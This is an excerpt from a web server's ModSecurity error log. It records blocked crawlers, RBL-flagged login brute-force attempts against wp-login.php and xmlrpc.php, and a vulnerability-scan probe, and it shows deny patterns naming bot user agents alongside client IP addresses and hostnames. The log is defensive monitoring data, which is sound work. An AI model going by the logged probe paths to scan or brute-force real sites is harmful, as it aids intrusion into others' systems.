[Tue May 26 17:25:16.002012 2026] [security2:error] [pid 882219:tid 882435] [client 114.119.147.113:62219] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.traderscafe.in"] [uri "/shop-2/"] [unique_id "ahWKJJ8tTkZcqimiXcT_0AAAANs"], referer: http://www.traderscafe.in/shop-2/?filter_cat=58%2C91%2C29%2C98%2C100%2C65
[Tue May 26 17:25:16.551022 2026] [security2:error] [pid 882219:tid 882401] [client 185.191.171.13:20902] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahWKJJ8tTkZcqimiXcT_4wAAALk"]
[Tue May 26 17:25:16.551116 2026] [security2:error] [pid 882219:tid 882401] [client 185.191.171.13:20902] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahWKJJ8tTkZcqimiXcT_4wAAALk"]
[Tue May 26 17:25:16.636327 2026] [security2:error] [pid 882219:tid 882266] [remote 94.76.235.103:36426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWKJJ8tTkZcqimiXcT_3QAAyy4"]
[Tue May 26 17:25:16.862647 2026] [security2:error] [pid 882219:tid 882415] [client 165.227.91.63:45850] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWKJJ8tTkZcqimiXcT_7QAAAMc"], referer: https://staging.unsobered.com/
[Tue May 26 17:25:17.334149 2026] [security2:error] [pid 882219:tid 882420] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKJJ8tTkZcqimiXcT_8wAAAMw"]
[Tue May 26 17:25:17.984193 2026] [security2:error] [pid 882219:tid 882475] [client 160.250.132.165:51532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "glorodbalsa.glorodavionics.com"] [uri "/wp-login.php"] [unique_id "ahWKJZ8tTkZcqimiXcQAEQAAAQM"]
[Tue May 26 17:25:18.246866 2026] [security2:error] [pid 882219:tid 882453] [client 165.227.91.63:45864] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWKJp8tTkZcqimiXcQAGAAAAO0"], referer: https://staging.unsobered.com/
[Tue May 26 17:25:18.922185 2026] [security2:error] [pid 882219:tid 882380] [client 74.7.241.168:40564] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "velanstore.ca"] [uri "/robots.txt"] [unique_id "ahWKJp8tTkZcqimiXcQALgAAAKQ"]
[Tue May 26 17:25:19.884700 2026] [security2:error] [pid 882219:tid 882404] [client 160.250.132.165:52556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKJ58tTkZcqimiXcQASgAAALw"]
[Tue May 26 17:25:20.086701 2026] [security2:error] [pid 882219:tid 882379] [client 202.76.174.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKJ58tTkZcqimiXcQASAAAAKM"]
[Tue May 26 17:25:20.284448 2026] [security2:error] [pid 882219:tid 882411] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKJ58tTkZcqimiXcQAUgAAAMM"]
[Tue May 26 17:25:20.975288 2026] [security2:error] [pid 882219:tid 882384] [client 216.244.66.241:36548] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/astirbaba/edcaed2202301.shtml"] [unique_id "ahWKKJ8tTkZcqimiXcQAeQAAAKg"]
[Tue May 26 17:25:20.975417 2026] [security2:error] [pid 882219:tid 882384] [client 216.244.66.241:36548] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/astirbaba/edcaed2202301.shtml"] [unique_id "ahWKKJ8tTkZcqimiXcQAeQAAAKg"]
[Tue May 26 17:25:21.699860 2026] [security2:error] [pid 882219:tid 882476] [client 160.250.132.165:53569] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKKZ8tTkZcqimiXcQAiAAAAQQ"]
[Tue May 26 17:25:22.317457 2026] [security2:error] [pid 882219:tid 882400] [client 113.177.103.14:57020] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWKKp8tTkZcqimiXcQAnwAAALg"], referer: https://staging.unsobered.com/
[Tue May 26 17:25:22.799505 2026] [security2:error] [pid 882219:tid 882458] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKKp8tTkZcqimiXcQApwAAAPI"]
[Tue May 26 17:25:23.261917 2026] [security2:error] [pid 882219:tid 882309] [remote 69.49.112.72:44210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.112.49.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWKK58tTkZcqimiXcQAtAAAkFk"]
[Tue May 26 17:25:23.538012 2026] [security2:error] [pid 882219:tid 882375] [client 160.250.132.165:54645] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anabolsoriginais.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKK58tTkZcqimiXcQAxQAAAJ8"]
[Tue May 26 17:25:23.944871 2026] [security2:error] [pid 882219:tid 882437] [client 14.230.109.53:38154] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWKK58tTkZcqimiXcQAywAAAN0"], referer: https://staging.unsobered.com/
[Tue May 26 17:25:24.904705 2026] [security2:error] [pid 882219:tid 882355] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKLJ8tTkZcqimiXcQA5QAAAIs"]
[Tue May 26 17:25:25.357085 2026] [security2:error] [pid 882219:tid 882429] [client 203.194.101.7:56603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKLZ8tTkZcqimiXcQA-gAAANU"]
[Tue May 26 17:25:25.357274 2026] [security2:error] [pid 882219:tid 882429] [client 203.194.101.7:56603] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKLZ8tTkZcqimiXcQA-gAAANU"]
[Tue May 26 17:25:25.390233 2026] [security2:error] [pid 882219:tid 882440] [client 160.250.132.165:55718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "platformtaksi.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKLZ8tTkZcqimiXcQA_QAAAOA"]
[Tue May 26 17:25:26.915117 2026] [security2:error] [pid 882219:tid 882453] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKLp8tTkZcqimiXcQBKQAAAO0"]
[Tue May 26 17:25:27.034922 2026] [security2:error] [pid 882219:tid 882353] [client 146.56.204.198:56069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.204.56.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfrastructures.com"] [uri "/H-ui.admin.page/lib/webuploader/0.1.5/server/preview.php"] [unique_id "ahWKLp8tTkZcqimiXcQBOQAAAIk"]
[Tue May 26 17:25:27.125880 2026] [security2:error] [pid 882219:tid 882416] [client 223.235.98.214:19660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKLp8tTkZcqimiXcQBOgAAAMg"]
[Tue May 26 17:25:27.126077 2026] [security2:error] [pid 882219:tid 882416] [client 223.235.98.214:19660] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKLp8tTkZcqimiXcQBOgAAAMg"]
[Tue May 26 17:25:27.441141 2026] [security2:error] [pid 882219:tid 882474] [client 160.250.132.165:56833] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "doyecpa.com.taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWKL58tTkZcqimiXcQBUQAAAQI"]
[Tue May 26 17:25:29.352015 2026] [security2:error] [pid 882219:tid 882410] [client 160.250.132.165:57856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jesusmedinaweb.org.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKMZ8tTkZcqimiXcQBgAAAAMI"]
[Tue May 26 17:25:29.906067 2026] [security2:error] [pid 882219:tid 882416] [client 114.119.130.29:51051] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.grandconclaveindia.org.in"] [uri "/gci-evolution.php"] [unique_id "ahWKMZ8tTkZcqimiXcQBjAAAAMg"], referer: https://www.grandconclaveindia.org.in/gci-evolution.php
[Tue May 26 17:25:30.144361 2026] [security2:error] [pid 882219:tid 882367] [client 35.255.235.250:57795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.235.255.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWKMZ8tTkZcqimiXcQBjgAAAJc"]
[Tue May 26 17:25:30.144480 2026] [security2:error] [pid 882219:tid 882367] [client 35.255.235.250:57795] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWKMZ8tTkZcqimiXcQBjgAAAJc"]
[Tue May 26 17:25:30.793644 2026] [security2:error] [pid 882219:tid 882476] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKMp8tTkZcqimiXcQBmAAAAQQ"]
[Tue May 26 17:25:31.475469 2026] [security2:error] [pid 882219:tid 882390] [client 160.250.132.165:59019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-login.php"] [unique_id "ahWKM58tTkZcqimiXcQBrAAAAK4"]
[Tue May 26 17:25:31.612553 2026] [security2:error] [pid 882219:tid 882470] [client 216.244.66.241:42072] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/cryaesthesiabfea/abfdcb1655875.shtml"] [unique_id "ahWKM58tTkZcqimiXcQBvAAAAP4"]
[Tue May 26 17:25:31.612688 2026] [security2:error] [pid 882219:tid 882470] [client 216.244.66.241:42072] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/cryaesthesiabfea/abfdcb1655875.shtml"] [unique_id "ahWKM58tTkZcqimiXcQBvAAAAP4"]
[Tue May 26 17:25:31.793381 2026] [security2:error] [pid 882219:tid 882378] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKM58tTkZcqimiXcQBqwAAAKI"]
[Tue May 26 17:25:33.593211 2026] [security2:error] [pid 882219:tid 882467] [client 160.250.132.165:60217] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-login.php"] [unique_id "ahWKNZ8tTkZcqimiXcQB9AAAAPs"]
[Tue May 26 17:25:34.182502 2026] [security2:error] [pid 882219:tid 882383] [client 138.229.108.209:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWKNp8tTkZcqimiXcQCBQAAAKc"], referer: https://www.anujtradingco.com/
[Tue May 26 17:25:34.346388 2026] [security2:error] [pid 882219:tid 882382] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKNZ8tTkZcqimiXcQB_QAAAKY"]
[Tue May 26 17:25:35.415132 2026] [security2:error] [pid 882219:tid 882402] [client 160.250.132.165:61245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "d3dsystems.co.uk.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKN58tTkZcqimiXcQCKgAAALo"]
[Tue May 26 17:25:35.472135 2026] [security2:error] [pid 882219:tid 882458] [client 203.194.101.7:56922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKN58tTkZcqimiXcQCKwAAAPI"]
[Tue May 26 17:25:35.473149 2026] [security2:error] [pid 882219:tid 882458] [client 203.194.101.7:56922] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKN58tTkZcqimiXcQCKwAAAPI"]
[Tue May 26 17:25:35.491320 2026] [security2:error] [pid 882219:tid 882388] [client 138.229.108.209:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWKN58tTkZcqimiXcQCKQAAAKw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1269060&moderation-hash=2686f0e0ed09014963caab940cba81a0
[Tue May 26 17:25:36.516374 2026] [security2:error] [pid 882219:tid 882375] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKOJ8tTkZcqimiXcQCQAAAAJ8"]
[Tue May 26 17:25:37.226672 2026] [security2:error] [pid 882219:tid 882444] [client 160.250.132.165:62284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "askmeblogger.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKOZ8tTkZcqimiXcQCYwAAAOQ"]
[Tue May 26 17:25:37.731184 2026] [security2:error] [pid 882219:tid 882397] [client 223.235.98.214:7937] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKOZ8tTkZcqimiXcQCbAAAALU"]
[Tue May 26 17:25:37.731309 2026] [security2:error] [pid 882219:tid 882397] [client 223.235.98.214:7937] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKOZ8tTkZcqimiXcQCbAAAALU"]
[Tue May 26 17:25:38.897122 2026] [security2:error] [pid 882219:tid 882442] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKOp8tTkZcqimiXcQCgQAAAOI"]
[Tue May 26 17:25:38.919229 2026] [security2:error] [pid 882219:tid 882356] [client 43.172.198.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWKOp8tTkZcqimiXcQCjAAAAIw"]
[Tue May 26 17:25:39.274430 2026] [security2:error] [pid 882219:tid 882438] [client 160.250.132.165:63430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.ktmadvance-senegal.com"] [uri "/wp-login.php"] [unique_id "ahWKO58tTkZcqimiXcQCmgAAAN4"]
[Tue May 26 17:25:40.818826 2026] [security2:error] [pid 882219:tid 882475] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKPJ8tTkZcqimiXcQCtAAAAQM"]
[Tue May 26 17:25:41.294155 2026] [security2:error] [pid 882219:tid 882387] [client 160.250.132.165:64557] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.glorodrc.com"] [uri "/wp-login.php"] [unique_id "ahWKPZ8tTkZcqimiXcQCyAAAAKs"]
[Tue May 26 17:25:43.455238 2026] [security2:error] [pid 882219:tid 882399] [client 160.250.132.165:49260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWKP58tTkZcqimiXcQDFwAAALc"]
[Tue May 26 17:25:43.578597 2026] [security2:error] [pid 882219:tid 882476] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKP58tTkZcqimiXcQDCgAAAQQ"]
[Tue May 26 17:25:43.985544 2026] [security2:error] [pid 882219:tid 882395] [client 138.229.108.209:61241] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWKP58tTkZcqimiXcQDFgAAALM"], referer: https://anujtradingco.com
[Tue May 26 17:25:45.304751 2026] [security2:error] [pid 882219:tid 882475] [client 160.250.132.165:50343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mitwebsolutions.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKQZ8tTkZcqimiXcQDRwAAAQM"]
[Tue May 26 17:25:45.518481 2026] [security2:error] [pid 882219:tid 882438] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKQZ8tTkZcqimiXcQDQQAAAN4"]
[Tue May 26 17:25:45.782308 2026] [security2:error] [pid 882219:tid 882384] [client 203.194.101.7:57243] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKQZ8tTkZcqimiXcQDVwAAAKg"]
